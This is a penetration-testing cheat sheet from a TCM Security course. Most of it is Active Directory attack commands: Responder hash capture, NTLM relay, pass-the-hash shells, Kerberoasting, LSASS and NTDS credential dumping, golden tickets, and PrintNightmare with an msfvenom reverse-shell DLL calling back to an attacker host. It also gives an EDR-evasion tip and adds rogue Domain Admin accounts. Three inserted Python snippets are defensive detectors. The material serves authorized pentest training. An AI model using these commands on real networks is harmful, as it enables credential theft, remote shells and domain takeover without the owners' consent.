Cheatsheet from the PJPT course of TCM security.
- Discover hosts and scan the network

```bash
# host discovery on the local subnet
sudo arp-scan -l
netdiscover -r 192.168.5.0/24
# full port scan with version/OS detection and default scripts
nmap -T4 -p- -A 192.168.5.0/24
nmap -T4 -p- -A 192.168.5.1
# SYN scan with default scripts only
nmap -T4 -p- -sS -sC 192.168.5.0/24
```
- Start Responder to capture NTLMv2 hashes (LLMNR/NBT-NS poisoning)

```bash
sudo responder -I tun0 -dP
```

- If an NTLMv2 hash was captured, copy it into a text file and crack it with hashcat (mode 5600 = NetNTLMv2)

```bash
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
```
This attack (SMB relay) works when SMB signing is disabled or not required on the target machines.

- Enumerate which hosts do not require SMB signing

```bash
# hosts reporting "Message signing enabled but not required" (or disabled) are the ones that go into targets.txt
nmap -p445 192.168.5.0/24 --script=smb2-security-mode
```

- Turn off Responder's SMB and HTTP servers so the authentication is relayed instead of captured

```bash
sudo nano /etc/responder/Responder.conf
```

```
SMB = Off
HTTP = Off
```

- Start Responder

```bash
sudo responder -I tun0 -dP
```

- Set up the relay (targets.txt holds the IPs that do not require signing)

```bash
# to dump the local password hashes (SAM)
sudo ntlmrelayx.py -tf targets.txt -smb2support
# to get an interactive SMB shell
sudo ntlmrelayx.py -tf targets.txt -smb2support -i
# to run a single command as proof of execution
sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"
```
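Added example (not from the course material): a small Python parser, from the defender's side, that takes the normal output of the nmap smb2-security-mode scan above and lists every host where message signing is not enforced, i.e. the hosts that still need SMB signing turned on. The scan output is constructed, not a real result.

```python
import re

# Constructed sample of the normal output of
# "nmap -p445 --script=smb2-security-mode" (not a real scan result).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.5.1
445/tcp open  microsoft-ds
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 192.168.5.2
445/tcp open  microsoft-ds
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 192.168.5.3
445/tcp open  microsoft-ds
| smb2-security-mode:
|   2.1:
|_    Message signing disabled
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
SIGNING_RE = re.compile(r"Message signing (.+?)\s*$")

def relay_exposed_hosts(nmap_output):
    """Return {host: signing_state} for every host whose SMB signing is not
    enforced. Such hosts accept relayed NTLM authentication; the fix is the GPO
    "Microsoft network server: Digitally sign communications (always)" = Enabled."""
    exposed = {}
    host = None
    for line in nmap_output.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)   # remember which host the script block belongs to
            continue
        m = SIGNING_RE.search(line)
        if m and host is not None:
            state = m.group(1)
            if state != "enabled and required":
                exposed[host] = state
    return exposed

if __name__ == "__main__":
    for host, state in relay_exposed_hosts(SAMPLE_NMAP_OUTPUT).items():
        print(f"{host}: message signing {state} -> enforce SMB signing")
```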
Create a shell with psexec

```bash
# for domain users
psexec.py test.local/fcastle:'Password1'@192.168.5.1
# for local users
psexec.py fcastle:'Password1'@192.168.5.1
# with a local user and password hash (pass-the-hash; impacket's option is -hashes with a single dash)
psexec.py Administrator@192.168.5.1 -hashes [LM-hash]:[NTLM-hash]
```

Create a shell with wmiexec

```bash
# with a local user and password hash
wmiexec.py Administrator@192.168.5.1 -hashes [LM-hash]:[NTLM-hash]
```

Create a shell with smbexec

```bash
# with a domain user and password
smbexec.py test.local/fcastle:'Password1'@192.168.5.1
```

Create a shell with metasploit

```
use exploit/windows/smb/psexec
set SMBDomain test.local
set SMBUser fcastle
set SMBPass Password1
set RHOSTS 192.168.5.2
run
```
If IPv6 is enabled on the network but no IPv6 DNS server is in use, mitm6 can impersonate one and the resulting authentications can be relayed.

- Start mitm6 for the target domain

```bash
sudo mitm6 -d test.local
```

- Start ntlmrelayx.py, relaying to LDAPS on the domain controller

```bash
sudo ntlmrelayx.py -6 -t ldaps://192.168.5.1 -wh fakewpad.test.local -l lootme
```

- The results are saved in the -l directory, e.g. '/home/kali/lootme/domain_computers.html'
Domain Enumeration with ldapdomaindump

- Run ldapdomaindump against the domain controller; this creates files with information about the domain

```bash
sudo ldapdomaindump ldaps://192.168.5.1 -u 'test.local\fcastle' -p Password1
```

- List all files and open the html files to investigate the domain information

```bash
# list all files
ls -l
# open all html domain files
firefox domain_*.html
```
Domain Enumeration with Bloodhound

- Run the bloodhound collector with credentials to fetch information

```bash
sudo bloodhound-python -d [DOMAIN] -u [USERNAME] -p [USER-PW] -ns [DC-IP] -c all
# example
sudo bloodhound-python -d test.local -u fcastle -p Password1 -ns 192.168.5.1 -c all
```

- Start the neo4j database and bloodhound to import the files

```bash
# if you start the database for the first time, set a new password - REMEMBER THE PASSWORD!
sudo neo4j console
# start bloodhound
sudo bloodhound
```

- Once bloodhound is running, drag and drop the json files into bloodhound and start investigating ;)
Domain Enumeration with Plumhound

- Start the neo4j database and bloodhound

```bash
# if you start the database for the first time, set a new password - REMEMBER THE PASSWORD!
sudo neo4j console
# start bloodhound
sudo bloodhound
```

- Start Plumhound against the domain controller - BLOODHOUND MUST ALREADY BE RUNNING!

```bash
sudo python3 PlumHound.py --easy -p [USER-PW]
sudo python3 PlumHound.py -x tasks/default.tasks -p [USER-PW]
```

- Finally open the generated reports in the browser and investigate the results
If we have credentials with local admin privileges on a machine, we can dump the SAM database of that computer.
If we have password hashes but cannot crack them, we can still use the hash itself to authenticate (pass-the-hash).

- Test your credentials across the network

```bash
# tests the credentials via SMB on the whole network; "(Pwn3d!)" means we have local admin rights on that machine
crackmapexec smb 192.168.5.0/24 -d test.local -u fcastle -p Password1
# or with a password hash
crackmapexec smb 192.168.5.0/24 -d test.local -u administrator -H [HASH]
```

- Let's dump some local hashes

```bash
# first way - secretsdump with credentials (domain/user, quoted so the shell leaves it alone)
secretsdump.py 'test.local/fcastle:Password1@192.168.5.2'
# second way - secretsdump with a password hash
secretsdump.py administrator@192.168.5.3 -hashes [LM-HASH]:[NT-HASH]
```

```
# third way - Metasploit
use windows/smb/psexec
set SMBDomain test.local
set SMBUser fcastle
set SMBPass Password1
set RHOSTS 192.168.5.2
run
hashdump
```
- Useful crackmapexec options

| Option | Description |
|---|---|
| --local-auth | Authenticate locally to each target |
| --sam | Dump SAM hashes from the target system |
| --lsa | Dump LSA secrets from the target system |
| --shares | Enumerate shares and access |
| -M | Specify a module |
| -L | List available modules for each protocol |
- Let's use some modules in crackmapexec

```bash
# module: lsassy (dumps credentials from LSASS memory)
crackmapexec smb 192.168.5.0/24 -d test.local -u administrator -H [HASH] --local-auth -M lsassy
# access the crackmapexec database of gathered credentials
cmedb
```
Kerberoasting targets accounts that have a Service Principal Name (SPN): any authenticated domain user can request a TGS for such a service account.
The returned ticket is encrypted with the service account's password hash, so we can take it offline and crack it.

- Get SPNs with impacket

```bash
# request TGS tickets for all user accounts that have an SPN
python GetUserSPNs.py test.local/fcastle:Password1 -dc-ip 192.168.5.1 -request
```

- Copy the hash(es) into a text file, then run hashcat against it

```bash
# mode 13100 = Kerberos 5 TGS-REP etype 23 (RC4)
hashcat -m 13100 SPNs-hash.txt /usr/share/wordlists/rockyou.txt
```
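Added example (not part of the course material): detection logic for the Kerberoast pattern described above, run over constructed Windows Security event 4769 records. It flags RC4 (0x17) service-ticket requests for non-machine service accounts other than krbtgt and groups them per requesting user, which is what a blue team alerts on. The event dicts, user names and IPs are made up.

```python
from collections import defaultdict

# Constructed sample of Windows Security event 4769 (Kerberos service ticket
# requested), one dict per event with the fields that matter; not real log data.
SAMPLE_4769_EVENTS = [
    {"TargetUserName": "fcastle@TEST.LOCAL", "ServiceName": "SQLService",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.5.50"},
    {"TargetUserName": "fcastle@TEST.LOCAL", "ServiceName": "HTTPService",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.5.50"},
    {"TargetUserName": "fcastle@TEST.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.5.50"},
    {"TargetUserName": "pbarker@TEST.LOCAL", "ServiceName": "CLIENT-01$",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.5.60"},
    {"TargetUserName": "pbarker@TEST.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.168.5.60"},
    {"TargetUserName": "tsmith@TEST.LOCAL", "ServiceName": "SQLService",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.168.5.70"},
]

RC4_HMAC = "0x17"  # etype 23; these are the tickets hashcat mode 13100 cracks

def is_roastable_request(ev):
    """True for a TGS request matching the Kerberoast pattern: an RC4-encrypted
    ticket for a user (non-machine) service account other than krbtgt."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")

def kerberoast_suspects(events, min_services=2):
    """Group roastable requests by requesting account and return the accounts
    that asked for tickets to at least min_services distinct service accounts
    (one RC4 request can be legitimate; a burst across many SPNs rarely is)."""
    seen = defaultdict(set)
    for ev in events:
        if is_roastable_request(ev):
            seen[ev["TargetUserName"]].add(ev["ServiceName"])
    return {user: sorted(svcs) for user, svcs in seen.items()
            if len(svcs) >= min_services}

if __name__ == "__main__":
    for user, svcs in kerberoast_suspects(SAMPLE_4769_EVENTS).items():
        print(f"{user} requested RC4 service tickets for: {', '.join(svcs)}")
```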
If we have an active shell on a system, we can list all tokens present on the machine.
With those, we are able to impersonate other users.

- For this scenario we have a meterpreter shell

```
meterpreter > list_tokens -u
```

- Impersonate a user - example: the domain administrator

```
meterpreter > impersonate_token test\\administrator
```

- Credential dumping with Mimikatz (the prompt shown is from the PowerShell version)

```
mimikatz(powershell) # privilege::debug
mimikatz(powershell) # lsadump::lsa /patch
mimikatz(powershell) # sekurlsa::minidump lsass.DMP
mimikatz(powershell) # sekurlsa::logonPasswords
```
- LSASS dump file with Task Manager

```
# if you have a graphical user interface
# 1. Open Task Manager
# 2. Go to Details
# 3. Search for the lsass.exe process
# 4. Right-click -> Create dump file (lsass.DMP)
# 5. Move the dump file to your kali machine
# 6. Extract passwords and password hashes: pypykatz lsa minidump lsass.DMP
```

- LSASS dump with procdump

```
# on the target machine
procdump.exe -accepteula -ma lsass.exe out.dmp
# some EDR products alert on the string "lsass" - use the PID instead of the name
Get-Process lsass          # PowerShell
tasklist | findstr lsass   # CMD
# create the dump file by PID (580 is an example PID)
procdump.exe -accepteula -ma 580 out.dmp
```
- LSASS dump with crackmapexec

```bash
crackmapexec smb 192.168.5.0/24 -d test.local -u fcastle -p Password1 --lsa
# note: this returns password hashes and cleartext passwords, but they are not stored in cmedb
crackmapexec smb 192.168.5.0/24 -d test.local -u fcastle -p Password1 -M lsassy
```
If we have administrator privileges, we can add a compromised or newly created account to the local Administrators group or the Domain Admins group.

How to add a new user and add it to the local admin group

```
# create a new local user (quote the password: otherwise cmd.exe treats & as a command separator)
net user pentester "Please-Use-A-Strong-PW!56&" /add
# add the user to the local admin group
net localgroup Administrators pentester /add
```

How to add a new user and add it to the domain admin group

```
# create a new domain user
net user pentester "Please-Use-A-Strong-PW!56&" /add /domain
# add the user to the domain admin group
net group "Domain Admins" pentester /add /domain
```
cPassword attributes are still commonly found in Group Policy Preferences XML files on the NETLOGON/SYSVOL share of the domain controller.
Microsoft accidentally published the key to decrypt them :)

```
# Metasploit module that searches SYSVOL for GPP xml files with cpasswords
use auxiliary/scanner/smb/smb_enum_gpp
```

```bash
# tool is installed by default in kali
gpp-decrypt <CPASSWORD>
```
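Added example (not from the course): a Python scanner a defender can run over a copy of SYSVOL to find leftover cpassword attributes so the preference items can be removed and the affected passwords rotated; it only reports locations and decrypts nothing. The Groups.xml content is constructed and the cpassword value is a placeholder, not a real ciphertext.

```python
import os
import xml.etree.ElementTree as ET

# Constructed example of a Group Policy Preferences Groups.xml as stored under
# SYSVOL; the cpassword value is a made-up placeholder, not a real ciphertext.
SAMPLE_GROUPS_XML = """\
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="localadmin"
        changed="2019-03-01 10:00:00" uid="{CONSTRUCTED-UID-1}">
    <Properties action="U" userName="localadmin"
                cpassword="EXAMPLE_CPASSWORD_BLOB_NOT_REAL"/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="helpdesk"
        changed="2019-03-02 10:00:00" uid="{CONSTRUCTED-UID-2}">
    <Properties action="U" userName="helpdesk"/>
  </User>
</Groups>
"""

def find_cpasswords(xml_text, source="Groups.xml"):
    """Return one finding per element that carries a non-empty cpassword
    attribute. Each finding names the file, the element and the account so the
    preference item can be deleted and the account's password rotated."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if elem.get("cpassword"):
            findings.append({
                "file": source,
                "element": elem.tag,
                "account": elem.get("userName") or elem.get("accountName") or "?",
            })
    return findings

def scan_sysvol(root_dir):
    """Walk a mounted or copied SYSVOL tree and collect findings from every
    .xml file (Groups.xml, Services.xml, ScheduledTasks.xml, Drives.xml, ...)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8-sig") as fh:
                    findings.extend(find_cpasswords(fh.read(), path))
            except (ET.ParseError, OSError):
                continue  # not a GPP file or unreadable; skip it
    return findings
```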
- Dump the domain's NTLM hashes (NTDS.dit, via secretsdump's DCSync option)

```bash
secretsdump.py 'test.local/fcastle:Password1@192.168.5.2' -just-dc-ntlm
```
Golden ticket: we are using Mimikatz for this step.

```
privilege::debug
# pull down the secrets of the account we want
lsadump::lsa /inject /name:krbtgt
# now create the golden ticket; we need the following information from the output above:
#   SID of the domain
#   NTLM hash of the krbtgt account
kerberos::golden /User:Administrator /domain:test.local /sid:S-1-5-21-3311685201-1443070845-3622335404 /krbtgt:3f5f8a614cf590401df166f81b87bf17 /id:500 /ptt
# next open a command prompt that uses the golden ticket
misc::cmd
# now check our privileges by accessing another machine
dir \\Client-01\c$
```
NOTE: ZEROLOGON CAN CAUSE REAL DAMAGE TO YOUR DOMAIN CONTROLLER - IN THE WORST CASE YOU END UP WITH A NON-FUNCTIONAL DOMAIN CONTROLLER!
But why? Because the exploit sets the Domain Controller's machine account password to null and takes over the entire Domain Controller.
Pentest behaviour: you will (and should) test the domain controllers for the vulnerability. Exploiting it is usually not necessary - talk to your client!
https://github.com/SecuraBV/CVE-2020-1472

- Let's test whether our Domain Controller is vulnerable

```bash
# set up the scan script that checks whether the DC is vulnerable
git clone https://github.com/SecuraBV/CVE-2020-1472.git
cd CVE-2020-1472
sudo pip3 install -r requirements.txt
# run the check against the domain controller (NetBIOS name and IP); it does not exploit anything
python3 zerologon_tester.py DC-01 192.168.5.1
```
The Print Spooler service exposes functions that let users add printers, and the service runs as SYSTEM.
We are able to load a malicious DLL through it to get a shell as SYSTEM (PrintNightmare, CVE-2021-1675).

- Check if the target is vulnerable

```bash
rpcdump.py @192.168.5.3 | egrep 'MS-RPRN|MS-PAR'
# if the output contains these lines => vulnerable
# Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
# Protocol: [MS-RPRN]: Print System Remote Protocol
```

- Run the attack

```bash
# clone the repository
git clone https://github.com/cube0x0/CVE-2021-1675.git
# create a malicious DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ATTACKER-IP> LPORT=5555 -f dll > shell.dll
# host the malicious DLL on an SMB share (we share the current directory)
smbserver.py share . -smb2support
```

```
# create a listener with Metasploit
use multi/handler
set LHOST <ATTACKER-IP>
set LPORT 5555
set payload windows/x64/meterpreter/reverse_tcp
run
```

```bash
# run the attack
python3 CVE-2021-1675.py test.local/f.castle:Password1@192.168.5.2 '\\<ATTACKER-IP>\share\shell.dll'
```

```
# we should get a meterpreter reverse shell
# now we can dump the hashes - WE ARE SYSTEM :)
hashdump
```
With this PE (privilege escalation) variant, we are able to add a new user to the local admin group.

- Setup

```
# copy the raw PowerShell script (cve-2021-1675.ps1) into a new file on the target
```

- Run the attack

```powershell
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare   # adds the user `adm1n`/`P@ssw0rd` to the local admin group by default
Invoke-Nightmare -DriverName "Xerox" -NewUser "pentester" -NewPassword "Use-A-Strong-Password!5@"
```